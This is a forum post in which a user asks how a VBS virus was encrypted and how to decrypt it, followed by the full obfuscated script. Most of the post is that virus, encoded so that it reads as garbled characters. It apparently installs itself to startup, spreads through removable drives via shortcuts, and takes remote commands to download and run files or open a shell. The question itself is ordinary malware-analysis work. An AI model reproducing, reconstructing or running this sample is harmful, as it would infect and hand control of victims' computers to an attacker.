decrypt virus (.vbs)

Started by **Aincrad**, 19 October 2017, 15:59 PM


**Aincrad**

hi  ;D
I don't know how to decode this vbs, I can't even see how they encrypted it.
can someone explain to me how they encrypted it and how to decrypt it?

here's the vbs virus:

Code (vb):
dDssDajcooSLscaC = ((""šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b\85"™žŸŒ——"KhKMPŒ››ŒŸŒPM85—™–'"—KhKŸ 85—™–'š—KhK'Œ—ž858585"˜Kž"——š•K85žŸKž"——š•KhK¢žŽ"›ŸYŽŒŸš•ŽŸSM¢žŽ"›ŸYž"——MT85"˜K'"—ž¤žŸ˜š•85žŸK'"—ž¤žŸ˜š•KhKŽŒŸš•ŽŸSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"˜K"ŸŸ›š•85žŸK"ŸŸ›š•KhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85858585"™žŸŒ——™Œ˜KhK¢žŽ"›ŸYžŽ"›Ÿ™Œ˜85žŸŒŸ ›KhKž"——š•Yž›Ž"Œ—'š—žKSMžŸŒŸ ›MTKQKM‡M85"™žŸŒ——"KhKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žS"™žŸŒ——"TKQKM‡M85"'K™šŸK'"—ž¤žŸ˜š•Y'š—£"žŸžS"™žŸŒ——"TKŸ"™KK"™žŸŒ——"KhKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMPŸ˜›PMTKQKM‡M85ž›—"ŸKhKMgMKQKM§MKQKMiM85ž—›KhK`[[[K85"˜Kž›š™ž85"˜KŽ˜85"˜K›ŒŒ˜85"™'šKhKMM85 žž›Œ"™'KhKMM85žŸŒŸŒŸKhKMM85"˜Kš™š™Ž858585š™KšKž ˜K™£Ÿ858585"™žŸŒ™Ž85¢""—KŸ 8585"™žŸŒ——8585ž›š™žKhKMM85ž›š™žKhK›šžŸKSM"žXŒ¤MWMMT85Ž˜KhKž›—"ŸKSž›š™žWž›—"ŸT85ž—ŽŸKŽŒžKŽ˜KS[T85ŽŒžKM£ŽŽ ŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK£Ž ŸK›ŒŒ˜85ŽŒžKM ›ŒŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKKš™š™ŽYŽ—šž85KKKKKKžŸKš™š™ŽKhKK'"—ž¤žŸ˜š•Yš›™Ÿ£Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜KW]WK'Œ—žT85KKKKKKš™š™ŽY¢"ŸK›ŒŒ˜85KKKKKKš™š™ŽYŽ—šž85KKKKKKž"——š•Y ™KM¢žŽ"›ŸY£KZZmKMKQKŽ"S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"S^_T85KKKKKK¢žŽ"›ŸYœ "ŸK85ŽŒžKM ™"™žŸŒ——M85KKKKKK ™"™žŸŒ——85ŽŒžKMž™M85KKKKKKš¢™—šŒKŽ˜KS\TWŽ˜KS]T85ŽŒžKMž"ŸXž™M85KKKKKKž"Ÿš¢™—šŒKŽ˜KS\TWŽ˜KS]T85ŽŒžKMŽ¡M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK ›—šŒKS›ŒŒ˜T85ŽŒžKKM™ ˜X"¡M85KKKKKK›šžŸKM"žX™ ˜X"¡MW™ ˜"¡KK85ŽŒžKKM™ ˜X'Œ'M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK›šžŸKM"žX™ ˜X'Œ'MW™ ˜'Œ'KS›ŒŒ˜T85ŽŒžKKM™ ˜X›šŽžžM85KKKKKK›šžŸKM"žX™ ˜X›šŽžžMW™ 
˜›šŽžžKKK85ŽŒžKKMŽ˜Xž"——M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK›šžŸKM"žXŽ˜Xž"——MWŽ˜ž"——KS›ŒŒ˜TKK85ŽŒžKKM—ŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK—Ÿ'Œ'KS›ŒŒ˜TK85ŽŒžKKM£"ŸX›šŽžžM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK£"Ÿ›šŽžžKS›ŒŒ˜TK85ŽŒžKKMž—›M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKKž—›KhK¡Œ—KS›ŒŒ˜TKKKKKKKK85™Kž—ŽŸ8585¢žŽ"›ŸYž—›Kž—›8585¢™858585ž K"™žŸŒ——85š™KšKž ˜K™£Ÿ85"˜K—™–š•85"˜K'"—™Œ˜85"˜K'š—™Œ˜85"˜K'"—"Žš™85"˜K'š—"Žš™8585 ›žŸŒŸ85'šKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž8585"'KK"¡Y"žŒ¤KhKŸ KŸ"™85"'KK"¡Y'ž›ŒŽKKiK[KŸ"™85"'KK"¡Y"¡Ÿ¤›KKhK\KŸ"™85KKKK'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜KWK"¡Y›ŒŸ"KQKM‡MKQK"™žŸŒ——™Œ˜WŸ 85KKKK"'KK'"—ž¤žŸ˜š•Y'"—£"žŸžKS"¡Y›ŒŸ"KQKM‡MKQK"™žŸŒ——™Œ˜TKKŸ"™85KKKKKKKK'"—ž¤žŸ˜š•Y'Ÿ'"—S"¡Y›ŒŸ"KQKM‡MKKQK"™žŸŒ——™Œ˜TYŒŸŸ" ŸžKhK]V_85KKKK™K"'85KKKK'šKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYq"—ž85KKKKKKKK"'K™šŸK—™–'"—KŸ"™K£"ŸK'š85KKKKKKKK"'KK"™žŸKS'"—Y™Œ˜WMYMTKŸ"™85KKKKKKKKKKKK"'KK—ŽŒžKSž›—"ŸS'"—Y™Œ˜WKMYMTKS š ™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTTKgiKM—™–MKŸ"™85KKKKKKKKKKKKKKKK'"—YŒŸŸ" ŸžKhK]V_85KKKKKKKKKKKKKKKK"'KK ŽŒžKS'"—Y™Œ˜TKgiK ŽŒžKS"™žŸŒ——™Œ˜TKŸ"™85KKKKKKKKKKKKKKKKKKKK'"—™Œ˜KhKž›—"ŸS'"—Y™Œ˜WMYMT85KKKKKKKKKKKKKKKKKKKKžŸK—™–š•KhKž"——š•YŽŒŸž"šŸŽ ŸKS"¡Y›ŒŸ"KQKM‡MKKQK'"—™Œ˜KS[TKQKMY—™–MTK85KKKKKKKKKKKKKKKKKKKK—™–š•Y¢"™š¢žŸ¤—KhKb85KKKKKKKKKKKKKKKKKKKK—™–š•YŸŒ'Ÿ›ŒŸ"KhKMŽ˜Y£M85KKKKKKKKKKKKKKKKKKKK—™–š•Y¢š–"™'"ŽŸš¤KhKMM85KKKKKKKKKKKKKKKKKKKK—™–š•YŒ' ˜™ŸžKhKMZŽKžŸŒŸKMKQK›—ŒŽS'"—Y™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQKMQžŸŒŸKMKQK›—ŒŽS"™žŸŒ——™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQMQ£"ŸM85KKKKKKKKKKKKKKKKKKKK'"—"Žš™KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡MKQKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡YMKQKž›—"ŸS'"—Y™Œ˜WKMYMTS š ™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTQKM‡MTKQKM‡'Œ 
—Ÿ"Žš™‡MTK85KKKKKKKKKKKKKKKKKKKK"'KK"™žŸKS'"—"Žš™WMWMTKhK[KŸ"™85KKKKKKKKKKKKKKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'"—Y›ŒŸ"85KKKKKKKKKKKKKKKKKKKK—žK85KKKKKKKKKKKKKKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'"—"Žš™85KKKKKKKKKKKKKKKKKKKK™K"'85KKKKKKKKKKKKKKKKKKKK—™–š•YžŒ¡ST85KKKKKKKKKKKKKKKK™K"'85KKKKKKKKKKKK™K"'85KKKKKKKK™K"'85KKKK™£Ÿ85KKKK'šKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYž 'š—ž85KKKKKKKK"'K™šŸK—™–'š—KŸ"™K£"ŸK'š85KKKKKKKK'š—YŒŸŸ" ŸžKhK]V_85KKKKKKKK'š—™Œ˜KhK'š—Y™Œ˜85KKKKKKKKžŸK—™–š•KhKž"——š•YŽŒŸž"šŸŽ ŸKS"¡Y›ŒŸ"KQKM‡MKKQK'š—™Œ˜KQKMY—™–MTK85KKKKKKKK—™–š•Y¢"™š¢žŸ¤—KhKb85KKKKKKKK—™–š•YŸŒ'Ÿ›ŒŸ"KhKMŽ˜Y£M85KKKKKKKK—™–š•Y¢š–"™'"ŽŸš¤KhKMM85KKKKKKKK—™–š•YŒ' ˜™ŸžKhKMZŽKžŸŒŸKMKQK›—ŒŽS'š—Y™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQKMQžŸŒŸK£›—šKMKQK›—ŒŽS"™žŸŒ——™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQMQ£"ŸM85KKKKKKKK'š—"Žš™KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡'š—‡'Œ —Ÿ"Žš™‡MTK85KKKKKKKK"'KK"™žŸKS'š—"Žš™WMWMTKhK[KŸ"™85KKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'š—Y›ŒŸ"85KKKKKKKK—žK85KKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'š—"Žš™85KKKKKKKK™K"'85KKKKKKKK—™–š•YžŒ¡ST85KKKK™£Ÿ85™Kt'85™Kt'85™K"'85™£Ÿ85YŽ—Œ85™Kž 8585ž K ™"™žŸŒ——85š™KšKž ˜K™£Ÿ85"˜K'"—™Œ˜85"˜K'š—™Œ˜8585ž"——š•Y'—ŸKMsvp,,Šn€}}pyŠ€~p}‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"š™‡ ™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[T85ž"——š•Y'—ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"š™‡ ™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[T85'"—ž¤žŸ˜š•Y—Ÿ'"—KžŸŒŸ ›KQK"™žŸŒ——™Œ˜KWŸ 85'"—ž¤žŸ˜š•Y—Ÿ'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜KWŸ 8585'šKKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž85"'KK"¡Y"žŒ¤KhKŸ KŸ"™85"'KK"¡Y'ž›ŒŽKKiK[KŸ"™85"'KK"¡Y"¡Ÿ¤›KKhK\KŸ"™85KKKK'šKKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KSK"¡Y›ŒŸ"KQKM‡MTY'"—ž85KKKKKKKKKš™KšKž ˜K™£Ÿ85KKKKKKKKK"'KK"™žŸKS'"—Y™Œ˜WMYMTKŸ"™85KKKKKKKKKKKKK"'KK—ŽŒžKSž›—"ŸS'"—Y™Œ˜WKMYMTS š 
™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTTKgiKM—™–MKŸ"™85KKKKKKKKKKKKKKKKK'"—YŒŸŸ" ŸžKhK[85KKKKKKKKKKKKKKKKK"'KK ŽŒžKS'"—Y™Œ˜TKgiK ŽŒžKS"™žŸŒ——™Œ˜TKŸ"™85KKKKKKKKKKKKKKKKKKKKK'"—™Œ˜KhKž›—"ŸS'"—Y™Œ˜WMYMT85KKKKKKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS"¡Y›ŒŸ"KQKM‡MKQK'"—™Œ˜S[TKQKMY—™–MKT85KKKKKKKKKKKKKKKKK—ž85KKKKKKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS"¡Y›ŒŸ"KQKM‡MKQK'"—Y™Œ˜T85KKKKKKKKKKKKKKKKK™Kt'85KKKKKKKKKKKKK—ž85KKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS'"—Y›ŒŸ"TK85KKKKKKKKKKKKK™K"'85KKKKKKKKK™K"'85KKKKK™£Ÿ85KKKKK'šKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYž 'š—ž85KKKKKKKKK'š—YŒŸŸ" ŸžKhK[85KKKKK™£Ÿ85™K"'85™K"'85™K"'85™£Ÿ85¢žŽ"›ŸYœ "Ÿ85™Kž 8585' ™ŽŸ"š™K›šžŸKSŽ˜KW›ŒŒ˜T8585›šžŸKhK›ŒŒ˜85"ŸŸ›š•Yš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKŽ˜WK'Œ—ž85"ŸŸ›š•YžŸœ žŸ"ŒKM žXŒ'™ŸeMW"™'š˜ŒŸ"š™85"ŸŸ›š•Yž™K›ŒŒ˜85›šžŸKhK"ŸŸ›š•Yž›š™žŸ£Ÿ85™K' ™ŽŸ"š™8585' ™ŽŸ"š™K"™'š˜ŒŸ"š™85š™KšKž ˜K™£Ÿ85"'KK"™'KhKMMKŸ"™85KKKK"™'KhK"¢"KQKž›—"ŸK85KKKK"™'KhK"™'KKQKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMPŽš˜› Ÿ™Œ˜PMTKQKž›—"ŸK85KKKK"™'KhK"™'KKQKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMP ž™Œ˜PMTKQKž›—"Ÿ8585KKKKžŸKššŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85KKKKžŸKšžKhKššŸY£Žœ ¤KSMž—ŽŸKUK'š˜K¢"™^]Šš›ŒŸ"™'ž¤žŸ˜MT85KKKK'šKŒŽ"Kšž"™'šK"™Kšž85KKKKKKK"™'KhK"™'KQKšž"™'šYŽŒ›Ÿ"š™KQKž›—"ŸKK85KKKKKKK£"ŸK'š85KKKK™£Ÿ85KKKK"™'KhK"™'KQKM›— žMKQKž›—"Ÿ85KKKK"™'KhK"™'KQKžŽ "Ÿ¤KQKž›—"Ÿ85KKKK"™'KhK"™'KQK žž›Œ"™'85KKKK"™'š˜ŒŸ"š™KhK"™'KK85—ž85KKKK"™'š˜ŒŸ"š™KhK"™'85™K"'85™K' ™ŽŸ"š™858585ž K ›žŸŒŸKST85š™KšKž ˜Ky£Ÿ8585ž"——š•Y'¢"ŸKMsvp,,Šn€}}pyŠ€~p}‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"š™‡ ™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TWKKM¢žŽ"›ŸY£KZZmKMKQKŽ"¢S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"¢S^_TKWKM}prŠ~...M85ž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"š™‡ 
™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TWKKM¢žŽ"›ŸY£KZZmKMKKQKŽ"¢S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"¢S^_TKWKM}prŠ~...M85'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜W"™žŸŒ——"KQK"™žŸŒ——™Œ˜WŸ 85'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜WžŸŒŸ ›KQK"™žŸŒ——™Œ˜KWŸ 8585™Kž 858585' ™ŽŸ"š™K"¢"85š™KšKž ˜K™£Ÿ8585žŸKššŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸK"ž–žKhKššŸY£Žœ ¤KSMž—ŽŸKUK'š˜K¢"™^]Š—š'"ŽŒ—"ž–MT85'šKŒŽ"K"ž–K"™K"ž–ž85KKKK"'KK"ž–Y¡š— ˜ž"Œ—™ ˜KgiKMMKŸ"™85KKKKKKKK"¢"KhK"ž–Y¡š— ˜ž"Œ—™ ˜85KKKKKKKK£"ŸK'š85KKKK™K"'85™£Ÿ85™K' ™ŽŸ"š™858585' ™ŽŸ"š™KžŽ "Ÿ¤K85š™KšKž ˜K™£Ÿ8585žŽ "Ÿ¤KhKMM8585žŸKš•¢˜"ž¡"ŽKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸKŽš—"Ÿ˜žKhKš•¢˜"ž¡"ŽY£Žœ ¤SMž—ŽŸKUK'š˜K¢"™^]Šš›ŒŸ"™'ž¤žŸ˜MWW_cT85'šKŒŽ"Kš•"Ÿ˜K"™KŽš—"Ÿ˜ž85KKKK¡ž"š™žŸKhKž›—"ŸKSš•"Ÿ˜Y¡ž"š™WMYMT85™£Ÿ85¡ž"š™žŸKhKž›—"ŸKSŽš—"Ÿ˜žY¡ž"š™WMYMT85šž¡ž"š™KhK¡ž"š™žŸKS[TKQKMYM85'šKK£KhK\KŸšK š ™KS¡ž"š™žŸT854Kšž¡ž"š™KhKšž¡ž"š™KQKK¡ž"š™žŸKS"T85™£Ÿ85šž¡ž"š™KhK¡Œ—KSšž¡ž"š™T85"'KKšž¡ž"š™KiKaKŸ"™KžŽKhKMžŽ "Ÿ¤Ž™Ÿ]MK—žKžŽKhKMžŽ "Ÿ¤Ž™ŸM8585žŸKš•žŽ "Ÿ¤Ž™ŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže‡‡—šŽŒ—"šžŸ‡ššŸ‡MKQKžŽT85~ŸKŽš—Œ™Ÿ"¡" žKhKš•žŽ "Ÿ¤Ž™ŸY£Žœ ¤SMž—ŽŸKUK'š˜KŒ™Ÿ"¡" ž›š ŽŸMWM¢œ—MW[T8585'šKŒŽ"Kš•Œ™Ÿ"¡" žK"™KŽš—Œ™Ÿ"¡" ž85KKKKžŽ "Ÿ¤KKhKžŽ "Ÿ¤KKQKš•Œ™Ÿ"¡" žY"ž›—Œ¤™Œ˜KQKMKYM85™£Ÿ85"'KžŽ "Ÿ¤KKhKMMKŸ"™KžŽ "Ÿ¤KKhKM™Œ™XŒ¡M85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K"™žŸŒ™Ž85š™KšKž ˜K™£Ÿ8585 žž›Œ"™'KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKQKM‡MT85"'K žž›Œ"™'KhKMMKŸ"™85KKK"'K—ŽŒžKSK˜"S¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜W]TTKhKMe‡MKQKK—ŽŒžS"™žŸŒ——™Œ˜TKŸ"™85KKKKKK žž›Œ"™'KhKMŸ KXKMKQKŒŸ85KKKKKKž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKKQKM‡MWKK žž›Œ"™'WKM}prŠ~...M85KKK—ž85KKKKKK 
žž›Œ"™'KhKM'Œ—žKXKMKQKŒŸ85KKKKKKž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKKQKM‡MWKK žž›Œ"™'WKM}prŠ~...M8585KKK™K"'85™Kt'85858585 ›žŸŒŸ85žŸKžŽ"›Ÿ' ——™Œ˜ž"šŸKhKK'"—ž¤žŸ˜š•Y'Ÿ'"—KS¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜T85žŸK"™žŸŒ——' ——™Œ˜ž"šŸKhKK'"—ž¤žŸ˜š•Y'Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜T85"'KK—ŽŒžKSžŽ"›Ÿ' ——™Œ˜ž"šŸYž"šŸ›ŒŸ"TKgiK—ŽŒžKS"™žŸŒ——' ——™Œ˜ž"šŸYž"šŸ›ŒŸ"TKŸ"™K85KKKKž"——š•Y ™KM¢žŽ"›ŸY£KZZmKMKQKŽ"S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKn"S^_T85KKKK¢žŽ"›ŸYœ "ŸK85™Kt'85YŽ—Œ85žŸKš™š™ŽKhK'"—ž¤žŸ˜š•Yš›™Ÿ£Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜KWcWK'Œ—žT85"'KKY™ ˜KiK[KŸ"™K¢žŽ"›ŸYœ "Ÿ85™K' ™ŽŸ"š™858585ž Kž"Ÿš¢™—šŒKS'"— —W'"—™Œ˜T8585žŸ—"™–KhK'"— —85žŸžŒ¡ŸšKhK"™žŸŒ——"KQK'"—™Œ˜85žŸKš•"ŸŸ›š¢™—šŒKhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MKT85š•"ŸŸ›š¢™—šŒYš›™KM'ŸMWKžŸ—"™–WK'Œ—ž85š•"ŸŸ›š¢™—šŒYž™8585žŸKš•'žšš¢™—šŒKhKŽŒŸš•ŽŸKSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"'KKš•'žšš¢™—šŒY'"—£"žŸžKSžŸžŒ¡ŸšTKŸ"™85KKKKš•'žšš¢™—šŒY—Ÿ'"—KSžŸžŒ¡ŸšT85™K"'85K85"'Kš•"ŸŸ›š¢™—šŒYžŸŒŸ žKhK][[KŸ"™85KKK"˜KKš•žŸŒ˜š¢™—šŒ85KKKžŸKKš•žŸŒ˜š¢™—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85KKK¢"Ÿ"Kš•žŸŒ˜š¢™—šŒ8544YŸ¤›KhK\K8544Yš›™8544Y¢"ŸKš•"ŸŸ›š¢™—šŒYž›š™žš¤8544YžŒ¡Ÿš'"—KžŸžŒ¡Ÿš8544YŽ—šž85KKK™K¢"Ÿ"85KKKžŸKš•žŸŒ˜š¢™—šŒKhK™šŸ""™'85™K"'85"'Kš•'žšš¢™—šŒY'"—£"žŸžSžŸžŒ¡ŸšTKŸ"™85KKKž"——š•Y ™Kš•'žšš¢™—šŒY'Ÿ'"—KSžŸžŒ¡ŸšTYž"šŸ›ŒŸ"85™K"'K85™Kž 8585ž Kš¢™—šŒKS'"— —W'"—"T8585"'K'"—"KhKMMKŸ"™K85KKK'"—"KhK"™žŸŒ——"85™K"'8585žŸžŒ¡ŸšKhK'"—"KQK˜"KS'"— —WK"™žŸ¡KS'"— —WM‡MTKVK\T85žŸKš•"ŸŸ›š¢™—šŒKhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85š•"ŸŸ›š¢™—šŒYš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKM"žXž™"™'MKQKž›—"ŸKQK'"— 
—WK'Œ—ž85š•"ŸŸ›š¢™—šŒYž™KMM85KKKKK85žŸKš•'žšš¢™—šŒKhKŽŒŸš•ŽŸKSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"'KKš•'žšš¢™—šŒY'"—£"žŸžKSžŸžŒ¡ŸšTKŸ"™85KKKKš•'žšš¢™—šŒY—Ÿ'"—KSžŸžŒ¡ŸšT85™K"'85"'KKš•"ŸŸ›š¢™—šŒYžŸŒŸ žKhK][[KŸ"™85KKKK"˜KKš•žŸŒ˜š¢™—šŒ854žŸKKš•žŸŒ˜š¢™—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85KKKK¢"Ÿ"Kš•žŸŒ˜š¢™—šŒK8544KYŸ¤›KhK\K8544KYš›™8544KY¢"ŸKš•"ŸŸ›š¢™—šŒYž›š™žš¤8544KYžŒ¡Ÿš'"—KžŸžŒ¡Ÿš8544KYŽ—šž854™K¢"Ÿ"85KKKKžŸKš•žŸŒ˜š¢™—šŒKKhK™šŸ""™'85™K"'85"'Kš•'žšš¢™—šŒY'"—£"žŸžSžŸžŒ¡ŸšTKŸ"™85KKKž"——š•Y ™Kš•'žšš¢™—šŒY'Ÿ'"—KSžŸžŒ¡ŸšTYž"šŸ›ŒŸ"85™K"'K85™Kž 858585' ™ŽŸ"š™K ›—šŒKS'"— —T8585"˜KK"ŸŸ›š•Wš•žŸŒ˜ ›—šŒW ''85žŸKKš•žŸŒ˜ ›—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85¢"Ÿ"Kš•žŸŒ˜ ›—šŒK85KKKKKYŸ¤›KhK\K85KKKKKYš›™854KY—šŒ'š˜'"—K'"— —854K ''KhKYŒ854KYŽ—šž85™K¢"Ÿ"85žŸKš•žŸŒ˜š¢™—šŒKhK™šŸ""™'85žŸK"ŸŸ›š•KhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85"ŸŸ›š•Yš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKM"žXŽ¡"™'MKQKž›—"ŸKQK'"— —WK'Œ—ž85"ŸŸ›š•Yž™K ''85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K™ ˜"¡KST8585'šKKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž85"'KKK"¡Y"žŒ¤KhKŸ KŸ"™85KKKKK™ ˜"¡KhK™ ˜"¡KQK"¡Y›ŒŸ"KQKM§MKQK"¡Y"¡Ÿ¤›KQKž›—"Ÿ85™K"'85™£Ÿ85™Kq ™ŽŸ"š™8585' ™ŽŸ"š™K™ ˜'Œ'KS™ ˜"T8585™ ˜'Œ'KhK™ ˜"KQKž›—"Ÿ85'šKKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KS™ ˜"TYž 'š—ž85KKKKK™ ˜'Œ'KhK™ ˜'Œ'KQK'š—Y™Œ˜KQKM§MKQKMMKQKM§MKQKMMKQKM§MKQK'š—YŒŸŸ" ŸžKQKž›—"Ÿ85™£Ÿ8585'šKKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KS™ ˜"TY'"—ž85KKKKK™ ˜'Œ'KhK™ ˜'Œ'KQK'"—Y™Œ˜KQKM§MKQK'"—Yž"¥KKQKM§MKQKM'MKQKM§MKQK'"—YŒŸŸ" ŸžKQKž›—"Ÿ8585™£Ÿ85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K™ ˜›šŽžžKST8585š™KšKž ˜K™£Ÿ8585žŸKš•¢˜"ž¡"ŽKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸKŽš—"Ÿ˜žKhKš•¢˜"ž¡"ŽY£Žœ ¤SMž—ŽŸKUK'š˜K¢"™^]Š›šŽžžMWW_cT8585"˜Kš•"Ÿ˜85'šKŒŽ"Kš•"Ÿ˜K"™KŽš—"Ÿ˜ž854™ ˜›šŽžžKhK™ 
˜›šŽžžKQKš•"Ÿ˜Y™Œ˜KQKM§M854™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•"Ÿ˜Y›šŽžž"KQKM§M85KKKK™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•"Ÿ˜Y£Ž ŸŒ—›ŒŸ"KQKž›—"Ÿ85™£Ÿ85™K' ™ŽŸ"š™8585ž K£"Ÿ›šŽžžKS›"T85š™KšKž ˜K™£Ÿ8585ž"——š•Y ™KMŸŒž––"——KZqKZKZ{toKMKQK›"WbWŸ 85™Kž 8585ž K—Ÿ'Œ'KS —T85š™KšKž ˜K™£Ÿ8585'"—ž¤žŸ˜š•Y—Ÿ'"—K —85'"—ž¤žŸ˜š•Y—Ÿ'š—K —8585™Kž 8585' ™ŽŸ"š™KŽ˜ž"——KSŽ˜T8585"˜K"ŸŸ›š•Wš£ŽWŒŒ——'š˜Œ™¤8585žŸKš£ŽKhKž"——š•Y£ŽKSMPŽš˜ž›ŽPKZŽKMKQKŽ˜T85"'K™šŸKš£ŽYžŸš ŸYŒŸ™š'žŸŒ˜KŸ"™85KKKŒŒ——'š˜Œ™¤KhKš£ŽYžŸš 